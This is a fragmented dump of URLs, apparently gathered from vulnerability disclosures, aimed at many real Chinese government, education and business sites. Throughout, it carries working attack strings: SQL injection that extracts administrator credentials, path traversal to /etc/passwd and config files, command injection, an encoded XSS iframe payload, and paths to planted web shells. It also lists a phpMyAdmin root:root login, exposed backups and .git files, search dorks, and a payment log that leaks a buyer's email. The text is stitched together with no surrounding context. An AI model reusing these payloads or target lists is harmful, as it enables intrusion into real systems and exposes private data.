http://www.hfjs.gov.cn/Publish/content.jsp?magazine_id=080827121317&item_id=080827121387&body_id=080902122487 http://www.hfjs.gov.cn/jw_home/monthly_cover.jsp?item_id=0306&id=140307933015 http://www.hfjs.gov.cn/Publish/content.jsp?magazine_id=080827121317&item_id=080827121387&body_id=080902122487 http://test002.cqhot.com/user_login.php?accesscheck=%2Findex.php http://game.sina.com.hk/cgi-bin/api/fl/show/rate.cgi http://171.111.157.200:81/phpmyadmin/ root:root http://m.mafengwo.cn/i/3266276.html http://kdcs.hn.189.cn/speedTest//broadbandSpeedTest4/speedtest_proxy.jsp?ip=*.*.*.* http://www.czhrss.gov.cn/index.php?m=formguide&c=index&a=search?m=formguide&c=index&a=search&t=zlfwxm&searchtype=like&word_value=88888&dosubmit= 鎼?nbsp;绱?nbsp;&keyword=1 http://dny.mop.com/ http://218.244.138.241:9000/ http://vip.kankan.com/sftp-config.json http://wbond.net/sublime_packages/sftp/settings kankan.com/vip.kankan.com/ http://polyhotels.com/index.php?m=News&a=company&op=con&id=61%20and%201=1 http://polyhotels.com/admin.php登陆到网站管理后台。 http://kdb.lenovo.com.cn/.git/config http://kdb.lenovo.com.cn/_core/config.php.bak http://www.ly.com/Hotel/ajax/HotelInfoAjax.aspx?action=getHotelAjaxCotentHtml&hotelId=6192&pageKey=hotelcomments1200&iid=0.8779298369772732 http://222.82.208.98:8088/Report/userlogin.action http://wl.gametider.com.tw/member/register.action http://lifenote.baidu.com/fancybox/jquery.fancybox.css/1.php http://game.weibo.com/dahanghaisj?action=login&service=180012091139&ownpt=weibo&oid=1000106810002 http://1001.static.webgame9.com/static/gameshow/gameshowPublic/jquery-1.7.2.js http://1001.static.webgame9.com/static/gameshow/gameshowPublic/swfobject.js http://1001.static.webgame9.com/static/gameshow/sina/gameshow.js http://www.956122.com/user.do?action=showupdatepassword&username=admin http://tms.byd.com.cn/system/login!login.action http://java.sun.com/ http://106.2.180.186/ http://movie.weibo.com/movie/web/category?from=faxian_movie# http://movie.weibo.com/movie/web/category http://cpos168.com/Service.asmx/TryLogin http://223.87.12.196/pages/index.php?action=suc http://223.87.12.197/pages/index.php?action=suc mail.zto.cn/register.php http://promo.unionpay.com/globalfiesta/index/showdetail/ http://180.168.124.135/ www.rzrsrc.com http://www.ccf.org.cn/sites/ccf/ieeelb.jsp http://211.151.94.148/athlete/user/control.jsp?action1=viewAthlete&bh=2009010537 http://mmbox.myuni.com.cn/portalWeb/downloadservlet?downloadname=20150104/../../../../../../../../etc/passwd&TELPHONENUM=8618611881111&fujianFlag=true http://www.52mf.com.cn/index.php/apartment/appointment/index/id/4/ http://******* http://180.96.39.133:8000/ inurl:Article_Print.asp?ArticleID= http://www.dct.com.cn/Article_Print.asp?ArticleID=745 http://www.dct.com.cn/Announce.asp?ChannelID=1 http://www.wzqjks.com/Article_Print.asp?ArticleID=504 http://www.wzqjks.com/fkggzs/Announce.asp?ChannelID=1 http://www.lishou.com/dl/Article_Print.asp?ArticleID=3925 http://www.lishou.com/dl/Announce.asp?ChannelID=1 http://www.jt8421.com/Article_Class.asp?ClassID=2 http://www.jt8421.com/Announce.asp?ChannelID=1 http://www.jhsyzx.com/gms/Article_Print.asp?ArticleID=1855 http://www.jhsyzx.com/gms/Announce.asp?ChannelID=1 http://m.juhe.cn http://m.juhe.cn/data/index http://es.fesco.com.cn/hlr/lostpass.aspx www.fenfentong.com.cn/exchange_local_list.action http://www.21315.com/ http://credit.21315.com.cn/sysadmin/login.html http://appdownload.unionpay.com/hitdownload.php https://bioinfo-mml.sjtu.edu.cn/xwnr.php?newsID=-3090%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,CONCAT%28name,0x3a,password%29,NULL%20from%20admin# http://www.gxczzx.gov.cn/cm_list.php?q=22 http://218.78.217.76/newAnonymousComplaint.json http://210.14.147.144:8080/login.action http://210.14.147.145:8080/login.action http://60.191.38.57/ http://www.bjjy.gov.cn/cgi-bin/eduman1/doc.fcgi?U_fldDoPubType=60 http://180.153.29.44/ http://www.akqxj.com/dwgkxinxi.php?id=6 http://m.111.com.cn/question/login/ https://www.laiyifen.com/themes/laiyifen2/images/bottom_logo.png/.php http://www.laiyifen.com/liest.html/.php http://www.laiyifen.com/app/b2c/statics/swf/Laiyifen.swf/.php http://www.laiyifen.com/Mobile/wx.html/.php http://www.17u.com/hotel/home/mapbarhotel?cityId=1100&act=singleHotel&hotelId=7228&isShow=1&comefrom=2&numberId=0&width=280&height=190 http://ibi.hzau.edu.cn/3dmodel/work.php?m=1&jobid=%26cat+/etc/passwd%26 http://sfpt.tjufe.edu.cn/admin/down.aspx?type=notice&mc=../../../web.config http://202.201.166.131/wsyh/admin/down.aspx?type=notice&mc=../../../web.config http://218.199.196.90/admin/down.aspx?type=notice&mc=../../../web.config http://fin.hrbnu.edu.cn/wysf/admin/down.aspx?type=notice&mc=../../../web.config http://218.104.195.23/wsyh/admin/down.aspx?type=notice&mc=../../../web.config http://jf.cqwu.net/admin/down.aspx?type=notice&mc=../../../web.config http://202.38.194.47/admin/down.aspx?type=notice&mc=../../../web.config http://wsyh.tstc.edu.cn/admin/down.aspx?type=notice&mc=../../../web.config http://218.199.48.15/wsyh/admin/down.aspx?type=notice&mc=../../../web.config http://jxyxjybxk.haoyisheng.com/signup/admin/ http://jg.tjpu.edu.cn/zftal-hrm/xtgl/login_loginpage.html http://shanxi.sinosteel.com:8888/ http://dfi.bnuz.edu.cn/college/notice.php?noticeid=103 http://dfi.bnuz.edu.cn/college/notice.php?noticeid=103 http://www.lewaimai.com/config/editemployee/xxx.html http://ibi.hzau.edu.cn/member.php?id=3 http://mux.baidu.com/ http://60.10.8.147/member/member!findPwdone.action http://121.29.220.23:8080/wf/index.action http://zd.hek.cn/login.php www.wugang.gov.cn soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/ xmlns:rec="http://receive.blf.jcms soapenv:Header/ soapenv:Body rec:wsGetColumn soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/ xsi:type="xsd:string xsi:type="xsd:string xsi:type="xsd:string xsi:type="xsd:string rec:wsGetColumn soapenv:Body soapenv:Envelope www.wugang.gov.cn www.cshtz.gov.cn www.njqh.gov.cn www.sihong.gov.cn http://www.changde.gov.cn/jcms/services/WSReceive?wsdl http://www.cshtz.gov.cn/jcms/services/WSReceive?wsdl http://www.njqh.gov.cn/jcms/service/WSSynchronize?wsdl http://www.lg.gov.cn/jcms/service/WSSynchronize?wsdl http://gzw.zj.gov.cn/jcms/service/WSSynchronize?wsdl http://www.sqsc.gov.cn/jcms/service/WSSynchronize?wsdl http://www.dongtai.gov.cn/jcms/services/WSReceive?wsdl http://www.sdfgw.gov.cn/jcms/service/WSSynchronize?wsdl http://ipad.zaozhuang.gov.cn/jcms/service/WSSynchronize?wsdl http://www.taizhou.gov.cn/jcms/service/WSSynchronize?wsdl http://www.sihong.gov.cn/jcms/services/WSReceive?wsdl http://ggzy.jinan.gov.cn/jcms/services/WSReceive?wsdl http://www.wugang.gov.cn/jcms/services/WSReceive?wsdl http://www.gzlps.gov.cn/jcms/services/WSReceive?wsdl http://www.zpgt.gov.cn/jcms/services/WSReceive?wsdl http://www.taojiang.gov.cn/jcms/services/WSReceive?wsdl http://tz.lda.gov.cn/jcms/service/WSSynchronize?wsdl http://www.huimin.gov.cn/jcms/service/WSSynchronize?wsdl http://autoweb.zjwst.gov.cn/jcms2.5//services/WSSynchronize?wsdl http://www.cncn.gov.cn/jcms/services/WSReceive?wsdl http://jsxy.zucc.edu.cn/jcms/services/WSReceive?wsdl http://www.gzdpc.gov.cn//jcms/services/WSReceive?wsdl http://www.ceec.net.cn/jcms/services/WSReceive?wsdl http://www.lixia.gov.cn/jcms/services/WSReceive?wsdl http://www.jinhua.gov.cn/jcms/services/WSReceive?wsdl http://zzb.10.gov.cn/jcms/services/WSReceive?wsdl http://www.ninghai.gov.cn/jcms/services/WSReceive?wsdl http://www.sihong.gov.cn/jcms/services/WSReceive?wsdl http://www.jining.gov.cn/jcms/services/WSReceive?wsdl http://www.jc.gansu.gov.cn/jcms/services/WSReceive?wsdl http://www.zgzhijiang.gov.cn/jcms/services/WSReceive?wsdl http://www.hzgjj.gov.cn/jcms/services/WSReceive?wsdl http://anxiang.gov.cn/jcms/services/WSReceive?wsdl http://jcms.nantong.gov.cn/jcms/services/WSReceive?wsdl http://www.geta.gov.cn/jcms/services/WSReceive?wsdl http://pub.jsds.gov.cn/jcms/services/WSReceive?wsdl http://www.sinotrans.com/jcms/service/WSSynchronize?wsdl http://www.jc.gansu.gov.cn/jcms/services/WSReceive?wsdl http://www.nbxsws.gov.cn/jcms/services/WSReceive?wsdl http://www.jsforestry.gov.cn/jcms/services/WSReceive?wsdl http://www.lc-news.com/jcms/services/WSReceive?wsdl http://www.xinghua.gov.cn/jcms/services/WSReceive?wsdl http://autoweb.zjwst.gov.cn/jcms2.5/services/WSSynchronize?wsdl http://www.jinxiang.gov.cn/jcms/services/WSReceive?wsdl http://www.sdxm.gov.cn/jcms25/service/WSSynchronize?wsdl http://www.xwzf.gov.cn/jcms24/service/WSSynchronize?wsdl http://www.zjdpc.gov.cn/jcms/services/WSReceive?wsdl http://www.jskx.org.cn/jcms/service/WSSynchronize?wsdl http://www.lzcgq.gov.cn/jcms/service/WSSynchronize?wsdl http://www.jdxc.net/jcms/service/WSSynchronize?wsdl http://sfl.zucc.edu.cn/jcms/service/WSSynchronize?wsdl http://nyyey.news.tcedu.com.cn/jcms/service/WSSynchronize?wsdl http://edu.tcjmxx.cn/jcms/service/WSSynchronize?wsdl http://www.haiyan.gov.cn/jcms/service/WSSynchronize?wsdl http://jiaowuchu.blcu.edu.cn/jcms/service/WSSynchronize?wsdl http://xjco.cscec.com/jcms/service/WSSynchronize?wsdl http://www.sinotrans-csc.com/jcms/service/WSSynchronize?wsdl http://njzx.news.tcedu.com.cn/jcms/service/WSSynchronize?wsdl http://www.weihai.gov.cn/jcms/service/WSSynchronize?wsdl http://www.rongcheng.gov.cn/jcms/service/WSSynchronize?wsdl http://www.yidu.gov.cn/jcms/service/WSSynchronize?wsdl http://www.tzhl.gov.cn/jcms/service/WSSynchronize?wsdl http://www.cxyx.cn/jcms/service/WSSynchronize?wsdl http://www.lda.gov.cn/jcms/service/WSSynchronize?wsdl http://www.tcedu.com.cn/jcms/service/WSSynchronize?wsdl http://www.blcu.edu.cn/jcms/service/WSSynchronize?wsdl http://jiaowuchu.blcu.edu.cn/jcms/service/WSSynchronize?wsdl http://www.yzu.edu.cn/jcms/service/WSSynchronize?wsdl http://www.gzwd.gov.cn/jcms/services/WSReceive?wsdl http://www.sdfda.gov.cn/jcms/services/WSReceive?wsdl http://www.czzl.gov.cn/jcms/services/WSReceive?wsdl http://yxy.zucc.edu.cn/jcms/service/WSSynchronize?wsdl http://www.bisu.edu.cn/jcms/service/WSSynchronize?wsdl http://www.nanxun.gov.cn/jcms/services/WSReceive?wsdl http://www.sheshantravel.com/jcms/services/WSReceive?wsdl http://sha.sinotrans.com/jcms/service/WSSynchronize?wsdl http://www.lzcgq.gov.cn/jcms/service/WSSynchronize?wsdl http://www.sinotrans-csc.com/jcms/services/WSReceive?wsdl http://fx.10.gov.cn/jcms/services/WSReceive?wsdl http://cos.sto.cn/wui/theme/ecology7/page/login.jsp?templateId=1 http://www.sqlmap.org inurl:bmtd.do http://www.yjxzfw.com.cn/researchinfo.do?method=queryinfo&id=1 http://www.yjxzfw.com.cn/researchinfo.do?method=queryinfo&id=1 http://www.yjxzfw.com.cn/researchinfo.do?method=queryinfo&id=1 http://www.yjxzfw.com.cn/researchinfo.do?method=queryinfo&id=1 http://www.gygxzw.gov.cn:8066/researchinfo.do?method=queryinfo&id=1 http://www.tlsp.net/researchinfo.do?method=queryinfo&id=1 http://58.42.249.116/researchinfo.do?method=queryinfo&id=1 http://218.201.232.67:8080/researchinfo.do?method=queryinfo&id=1 http://hxasc.cn/researchinfo.do?method=queryinfo&id=1 http://jjjc.sqxz.gov.cn/researchinfo.do?method=queryinfo&id=1 http://119.1.108.246/researchinfo.do?method=queryinfo&id=1 http://58.42.241.14:6778/researchinfo.do?method=queryinfo&id=1 http://www.sinanxzfw.gov.cn/researchinfo.do?method=queryinfo&id=1 http://jc.dlxg.gov.cn/researchinfo.do?method=queryinfo&id=1 http://210.22.123.89:8083/active/wxseed_sharephone.action http://210.22.123.89:8083/active/wxseed_sharephone.action http://www.vobao.com/User/login.aspx http://mtodo.wanda.cn/ http://mtodo.wanda.cn/ServiceMobile.asmx http://mtodo.wanda.cn/ServiceMobile.asmx?op=GetUser http://www.cqpx.cc:8086/cqpxpt/recep_apply!applyStart.action http://**.**.**/zabbix/ http://**.**.**/zabbix/httpmon.phpapplications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28alias,0x7e,passwd,0x7e%29%20as%20char%29,0x7e%29%29%20from%20zabbix.users%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29 http://baike.sogou.com/v60793251.htm http://www.kuaiypay.com/ http://cdjiyao.com/index.php?go=product/show-43.html http://wooyun.org/bugs/wooyun-2010-072005 http://wooyun.org/bugs/wooyun-2010-071799 http://www.hyxzfw.gov.cn/search_read.asp?id=1083 http://www.wyxzfw.com/search_read.asp?id=1083 http://www.gzshebao.org/search_read.asp?id=1083 http://yeyou.mop.com/api/sys/login.ashx?cid=0.4477432502899319?pwd=e&rem=false&uid=-1 http://crm.chinapay.com/ http://crm.chinapay.com/www.rar http://www.cqldbz.gov.cn:6666/fwld/fwld_detail.jsp?id=140401001224 http://mifan.game7z.com:8080/login.jsp http://mifan.game7z.com:8080/businesses/updateBusinesses.action http://220.196.57.132/ http://220.196.57.132/xcshtitle.php?id=741 www.sfn.cn http://www.sfn.cn http://oa.998.com//weaver/weaver.email.FileDownloadLocation?fileid=1&do http://www.sqlmap.org http://220.163.43.25/vwss/www/index.jsp?o=1 http://220.163.43.25/vwss/www/index.jsp?o=1 http://volvo.wisdom-gps.com/user/login.aspx http://60.29.214.37:8866/?t=2014 www.tjbhbus.com http://px.qsjyy.com/study.action?module=listErsWithoutC.action http://m.wandaperformance.com/order/choose/ticket?performId=d0f0dbf7fa494da68e48c06646247cc8 http://220.191.210.43/hzajjqlyg-enterprise/nosecuritycheck/appEnter_createNavigationInit.xhtml?point=qy http://www.lianyuan.gov.cn/ http://www.lianyuan.gov.cn/test.rar http://www.17uty.net http://www.dfss.com.cn/manage/EditAdmin.aspx?ID=1 http://www.babymaxx.cn/order/orderItemInfoByOrderId?id=90 http://www.babymaxx.cn/order/orderItemInfoByOrderId?id=15 https://www.myrepospace.com/forums/index.php http://www.boqii.com/userinfo/User/address http://php.net/cached.php?f=cached.php&t=1419999608 https://github.com/php/web-php inurl:/Empl_Password_Modify.aspx http://www.hbgzgs.com/WebUI/Admin/Empl_Password_Modify.aspx http://www.hbbygs.net/WebUI/Admin/Empl_Password_Modify.aspx http://www.hbybgs.com/WebUI/Admin/Empl_Password_Modify.aspx http://www.xn--kkrw33fqsryzj.com/WebUI/admin/Empl_Password_Modify.aspx http://jjgldq.cn/WebUI/Empl_Password_Modify.aspx http://www.hbgzgs.com/WebUI/Article.aspx?MKBM_CODE=nbgl www.hbgzgs.com http://i.boqii.com/u/12227632 http://220.178.124.53:9090/hfyhpc/statistic/nosecuritycheck/loadQuarter.xhtml http://58.240.54.35/admin/loginAction.action filetype:xhtml http://www.wzsafety.gov.cn/webapp/refer/viewReferFront.xhtml?action1=3 http://www.huzsafety.gov.cn/proscenium/picManage/videoList.xhtml http://www.lwajj.gov.cn/webapp/longwView/videoList.xhtml?type=longwAqsp http://www.hsaj.gov.cn/webapp/refer/viewReferFront.xhtml?action1=3 http://www.tssafety.gov.cn/webapp/taisView/videoList.xhtml?type=taisAqsp http://www.hzxcsafety.gov.cn/webapp/appeal/viewAppealWrite.xhtml http://www.sfn.cn/order www.sfn.cn http://www.sfn.cn http://wooyun.org/bugs/wooyun-2010-068968 inurl:yzzx_cont.asp?id= http://www.21cake.com/shopadmin/index.php http://101.95.48.76/view.action?page=login.jsp http://101.95.48.76/base.action?page=WEB-INF/web.xml http://run.baidu.com/ http://whhtz.com/news.php?classid=1 http://www.teacher.com.cn/test.txt http://www.teacher.com.cn/app.txt http://www.teacher.com.cn/seo.asp http://www.teacher.com.cn/aspxspy.aspx http://www.teacher.com.cn/test.asp http://www.jdeyes.com http://pay.178.com/log.txt return_url_log:sign=c284183f5307f54f2ba3fcb0c0ae4e99&mysign=c284183f5307f54f2ba3fcb0c0ae4e99&body=充值10元&buyer_email=ssxxpp1990@vip.qq.com&buyer_id=2088002936008631&exterface=create_direct_pay_by_user&is_success=T¬ify_id=RqPnCoPT3K9%2Fvwbh3InTuv9uO54K1kwyTXvEK7F2bYNBLGY78yZKDJHpv7kDJYFHL7jB¬ify_time=2015-01-05 http://**.**.**/cpc/ http://112.80.15.14:8080/cpc/sysManager/indexAction!index.action http://www.chinaamc.com/gongju/fengxianceshi/csjg/index.shtml?test=java&fs= http://www.taoshu.com/user/myaddress.aspx http://**.**.**/CUST01reg/Report/ExamRegisterReportInfo.aspxID=079506_ http://**.**.**/CUST01reg/Report/ExamRegisterReportInfo.aspxID=079506 http://d.weibo.com/1075030100?pids=Pl_Core_P1MultiPic__6&cfs=920&Pl_Core_P1MultiPic__6_filter=2&ajaxpagelet=1&__ref=/1075030100&_t=FM_142051603498282 http://tdrec.youku.com/resin-doc/examples/security-basic/viewfile?file=WEB-INF/password.xml http://tdrec.youku.com/resin-doc/examples/security-basic/viewfile?file=WEB-INF/web.xml http://www.znmba.com/AdminManage/Default.aspx http://www.znmba.com/FckEditor/editor/filemanager/connectors/test.html http://wh.xiangtan.gov.cn/whj/hudong/szxx_hit.jsp?id=85814 http://wh.xiangtan.gov.cn/whj/hudong/szxx_hit.jsp?id= http://sqlmap.org http://wasai.360.cn/gen_inform.php http://10.108.79.189:80/&imgurl=&name=e&time=2015-1-6&weibo=1 error:http_code:0 error:http_code:404 content_length:202 image_length:202 http://www.fjipo.gov.cn/templates/download.jsp?path=/UserFiles/File/../../WEB-INF/web.xml http://www.fjipo.gov.cn/templates/download.jsp?path=/UserFiles/File/../../../../conf/tomcat-users.xml http://ep.wahaha.com.cn/ep/sale/account/reimburseSheetPrt.jsp?dao_no=(参数遍历) http://ep.wahaha.com.cn/ep/sale/account/reimburseSheetPrt.jsp?dao_no=90234 http://ep.wahaha.com.cn/ep/sale/account/reimburseSheetPrt.jsp?dao_no=90235 http://ep.wahaha.com.cn/ep/sale/account/reimburseSheetPrt.jsp?dao_no=90238 http://ep.wahaha.com.cn/ep/sale/account/reimburseSheetPrt.jsp?dao_no=90239 http://mux.baidu.com http://219.239.42.73:80/c/ http://180.149.139.84/api/help.php http://180.149.139.84/api/api.php?action=info&virtualserver=fe-dpool_wb_head_pic这个api存在注入 http://125.70.9.195:8080/cdfl/ https://i.alipayobjects.com/e/201309/17IDNJfn8n.swf。比如这个页面:https://yebprod.alipay.com/yeb/purchase.htm,当然还有其他好多页面会调用,这里不一一列举了。 http://car.yundasys.com:81/yd_khd/khd_add.php http://car.yundasys.com:81 http://sunshine.tedc.cn:8080/sunshine-1.0/mainMenu http://218.76.27.45:8062/index0.aspx http://zbtj.hyedu.net.cn/index0.aspx http://sc.zbglxt.com/ http://henan.zbglxt.com/index0.aspx http://hainan.zbglxt.com/index0.aspx http://tzgl.ynjy.cn/index0.aspx http://srm.chng.com.cn/HnSrmWebO/LogoutServlet http://www.jwc.zync.edu.cn/admin/Login.asp,接着爆管理员账号和密码; http://www.jwc.zync.edu.cn/user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin http://www.jwc.zync.edu.cn/user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_pass_word,3,4,5,6,7,8++from+FS_MF_Admin http://www.whhtz.com/lxwm.php?classid=48 http://www.whhtz.com/wlxs_ertong3.php?action=read&classid=&id=209 http://www.whhtz.com/news.php?action=read&classid=46&id=301 http://www.whhtz.com/jiameng.php?classid=40 http://www.whhtz.com/wlxs_ertong3.php?action=read&classid=&id=207 http://www.whhtz.com/wlxs_new_ertong2.php?classid=70 http://www.whhtz.com/news.php?action=read&classid=46&id=301” http://tjpt.my.tudou.com//resin-doc/examples/security-basic/viewfile?file=WEB-INF/web.xml http://weirenwu.weibo.com/taskv2/?c=Cpcs.cpcsSquare&goodstype=3 http://trs.kaiyuanhotels.com/index.htm dir:/home/trs/server/apache-tomcat/webapps/ROOT/ http://xxx/xxx.html https://twitter.com/avlidienbrunn/status/486059626002395136,但实际上这个方法的危害不止于此,大部分基于黑名单的富文本过滤器是没有考虑这个方式的XSS的,通过这个就能简单构造一个XSS。 http://mhz.pw/game/SOP/01.php inurl:dwgkview.aspx?tname= http://60.217.72.17:7129/ckq/dwgkview.aspx?tname=北郊镇&CountryName=前草村 http://123.134.189.60:8007/ckq/dwgkview.aspx?tname=辛庄镇&CountryName=北宝台村 http://218.56.99.84:8003/ckq/dwgkview.aspx?tname=般阳路街道&CountryName=东升社区 http://222.135.109.70:8200/ckq/dwgkview.aspx?tname=泽头镇&CountryName=吴官屯村 http://218.56.40.229:8053/ckq/dwgkview.aspx?tname=城港路街道&CountryName=谢家村 http://222.134.66.54:8014/ckq/dwgkview.aspx?tname=果里镇&CountryName=后鲁村 http://222.134.154.214:8001/ckq/dwgkview.aspx?tname=张家坡镇&CountryName=上河疃 http://218.59.205.41:8053/ckq/dwgkview.aspx?tname=高新区&CountryName=王东 http://218.25.79.219:8080/ http://218.25.79.219:8080/20144612104656.asp;.txt http://124.93.238.141:80/ http://124.93.238.141/20153106023123.asp;.txt http://www.ifengtv.com/superadmin/login.asp http://www.secoo.com/secoojimai/goodsCtrl/toAdd http://ota.pay.mobile.sina.cn/platform/wapChannel/pay/orderRequest.php?appName=%3C%69%66%72%61%6D%65%2F%73%72%63%3D%2F%2F%77%77%77%2E%77%6F%6F%79%75%6E%2E%6F%72%67%2F%2F%3E%3C%2F%69%66%72%61%6D%65%3E&msgFrom=8177&uid=3178101845&source=web&mobile=15736681404&fee=E8GtEJbuArE%3D&business_id=599&business_linkid=HrSedar5sl1LkTTc%2FfG%2BrA%3D%3D&IS_SUB=0&url=http%3A%2F%2Fota.pay.mobile.sina.cn%2Fweibo%2Fback.php%3Forder%3D2150869675 www.wooyun.org// http://115.239.248.6:28017/ http://www.focus.cn/chinacrrc/ inurl:IndexViewController.do?method=index http://www.lazfcg.gov.cn/huoshan/IndexViewController.do?method=index http://www.hszgj.cn/IndexViewController.do?method=index http://kszfcg.gov.cn/IndexViewController.do?method=index http://www.szzfcg.gov.cn/IndexViewController.do?method=index http://www.ydzfcg.gov.cn/IndexViewController.do?method=index http://ztb.taihe.gov.cn/IndexViewController.do?method=index http://www.qdkfqcg.gov.cn/IndexViewController.do?method=index http://www.fcxzfcg.gov.cn/IndexViewController.do?method=index http://www.lbzfcg.gov.cn/IndexViewController.do?method=index http://cgzx.ahzfcg.gov.cn/IndexViewController.do?method=index http://www.tlzbcg.com/IndexViewController.do?method=index http://www.sxzfcg.gov.cn/IndexViewController.do?method=index http://www.sixianzfcg.gov.cn/IndexViewController.do?method=index http://222.216.4.8/IndexViewController.do?method=index http://www.jimozfcg.cn/IndexViewController.do?method=index http://www.jzzfcg.gov.cn/IndexViewController.do?method=index http://218.22.70.134:85/IndexViewController.do?method=toLogin http://www.xxzfcg.gov.cn/IndexViewController.do?method=index http://www.hnzfcg.gov.cn/IndexViewController.do?method=index http://www.mczb.gov.cn/IndexViewController.do?method=index http://hscgw.gov.cn/IndexViewController.do?method=index http://www.lazfcg.gov.cn/yeji/IndexViewController.do?method=index http://www.lazfcg.gov.cn/jinan/IndexViewController.do?method=index http://www.lazfcg.gov.cn/shucheng/IndexViewController.do?method=index http://www.lazfcg.gov.cn/IndexViewController.do?method=index http://www.lazfcg.gov.cn/huoqiu/IndexViewController.do?method=index http://lbzfcg.gov.cn/IndexViewController.do?method=index http://mczb.gov.cn/IndexViewController.do?method=index http://zfcg.mccz.gov.cn/IndexViewController.do?method=index http://caigou.pingdu.gov.cn/IndexViewController.do?method=index http://zfcg.laoshan.gov.cn:88/IndexViewController.do?method=index http://www.aqzfcg.gov.cn/IndexViewController.do?method=index http://www.yqzfcg.cn/IndexViewController.do?method=index http://www.cngpc.com/IndexViewController.do?method=index http://lazfcg.gov.cn/IndexViewController.do?method=index http://60.171.34.186/IndexViewController.do?method=index http://168dev.com/lebishop/Category.aspx http://oa.psy123.com.cn/AllCategories.aspx http://www.huacaiye.com/Category.aspx?tid=1 http://daiba.com.cn/Category.aspx?id=9 http://hkapp.cn/EN/Category.aspx?id=10 http://54mbb.com/EN/NewsDetails.aspx?id=5 http://shop.lutoog.com/Brand.aspx?id=189 http://queengift.net/EN/Brand.aspx?id=190 http://www.snsrn.com/en/ http://www.skycastle100.com/Search.aspx?keyword=lianyiquan http://71pg.com/Category.aspx?tid=35 http://www.rft.net.cn/Search.aspx?keyword=[key]&sort=1&page=2 http://lovedou.com/en/ http://www.woofoo51.com/EN/Category.aspx?id=111&pid=0&sort=1&tid=0&page=1 http://newautoch.com/NewsDetails.aspx?id=5 http://memy.cc/ http://www.thanks789.com/Brand.aspx?id=191 http://m.gzyytz.cn/ http://www.thanks789.com/Brand.aspx?id=191 http://demo.lebi.cn/ajax/Ajax_order.aspx http://hr.meizu.com http://www.ahlz.cn/news/news_view.aspxtypeid=1&second_typeid=1&id=16533 http://www.ahlz.cn/news/show_view.aspx?typeid=1&second_typeid=1 http://**.**.** http://**.**.** http://all.vic.sina.com.cn/200910bmw/product_show.php?id=4676 http://xxx/xxx.html https://twitter.com/avlidienbrunn/status/486059626002395136,但实际上这个方法的危害不止于此,大部分基于黑名单的富文本过滤器是没有考虑这个方式的XSS的,通过这个就能简单构造一个XSS。 https://auth.mhz.pw/game/sop/01.php http://rsc.nankai.edu.cn/wwwroot.rar http://recruitment.nankai.edu.cn/这么慢。。。。本想测试一下的。。但是打开不是一般的慢啊。。。。还是算了吧。。。。话说南开招人,网站还那么慢。。。我也是醉了。。。 www.qrcb.cc/disp.aspx?mid=22&aid=1183 http://www.narcb.com:8888/wwwroot.zip http://www.ssrcb.com/aspcheck.asp http://www.zhaokao.net/pingjia_pic.jsp?pid=0&colid=18496 http://211.144.118.47:8080/systemadmin/jibenpeizhi.aspx google:site:db.178.com http://db.178.com/qn/search/s/na:test'&item:on&skill:on&quest:on&monster:on&npc:on&map:on&equip:on http://db.178.com/ldj/skill-list/na:test http://db.178.com/gw2/item-list/na:test'&type:Armor http://db.178.com/dota2/search/s/na:test'&item:on&hero:on&spell:on&npc:on http://portal.alog.cc/DesktopDefault.aspx?tabindex=0&tabid=972&ItemID=668 http://www.turbomail.org/ http://mail.ieds.com.cn/nicknamelogin.jsp http://mail.cttsx.com/nicknamelogin.jsp尚未被修复,依然处于直接登录状态,暗喜开始xss测试。 http://**.**.**/manage/sys/login.shtml http://221.236.79.148:7890/oa/themes/mskin/login/login.jsp http://60.217.72.17:8073/ http://218.56.40.229:8024/ http://218.56.159.98:8000/ http://221.2.156.181:8100/ http://123.134.189.60:8012/ http://123.133.64.59:8021/ http://nlw.laiwu.gov.cn/ http://221.2.149.47:8100/ http://xxx.com/WebEditor/include/upopen.aspx http://www2.zzu.edu.cn/szjy/lldj/juti.asp?id=80 http://222.177.124.35:8082/cqyfk/page/article/readArticle.action?article_id=402881f546611193014672339b460001 http://210.75.218.116:8080/mim/) http://210.75.218.118:8080/grm/) http://omp.redotapp.com intext:Powered inurl:Category.aspx http://168dev.com/lebishop/Category.aspx http://oa.psy123.com.cn/AllCategories.aspx http://www.huacaiye.com/Category.aspx?tid=1 http://daiba.com.cn/Category.aspx?id=9 http://hkapp.cn/EN/Category.aspx?id=10 http://54mbb.com/EN/NewsDetails.aspx?id=5 http://shop.lutoog.com/Brand.aspx?id=189 http://queengift.net/EN/Brand.aspx?id=190 http://www.snsrn.com/en/ http://www.skycastle100.com/Search.aspx?keyword=lianyiquan http://71pg.com/Category.aspx?tid=35 http://www.rft.net.cn/Search.aspx?keyword=[key]&sort=1&page=2 http://lovedou.com/en/ http://www.woofoo51.com/EN/Category.aspx?id=111&pid=0&sort=1&tid=0&page=1 http://newautoch.com/NewsDetails.aspx?id=5 http://memy.cc/ http://www.thanks789.com/Brand.aspx?id=191 http://m.gzyytz.cn/ http://www.thanks789.com/Brand.aspx?id=191 http://demo.lebi.cn/ajax/Ajax_userin.aspx http://infosec.sjtu.edu.cn/PeopleDetail.asp?id=1026 http://jiwei.sjtu.edu.cn/admin/login.asp http://fun.kid.qq.com/funshop/testfunshow/ebookController/update_assets_list?campaignID=0&etclass=0&formatID=50 http://61.138.243.24/ http://61.138.243.24/jmx-console/ http://crm.itrus.com.cn/ http://crm.itrus.com.cn/pub/bgtaskreq.php?svr=1 http://crm.itrus.com.cn/background/smsstatusreport.php?ID=1 http://crm.itrus.com.cn/background/sendsms.php?ID=1 http://www.fingerage.com/ http://www.fingerage.com/admin/index.html http://222.168.57.99/20143812073858.asp;.txt http://123.127.67.38/ inurl:/ws2004/ http://www.suyaxing.com:81/ws2004/ http://www.suyaxing.com:81/ws2004/SysManage/LeaveWord http://sgtjb.com/ws2004/ http://sgtjb.com/ws2004/SysManage/LeaveWord http://www.sdjnzx.com/ws2004/ http://www.sdjnzx.com/ws2004/SysManage/Leav 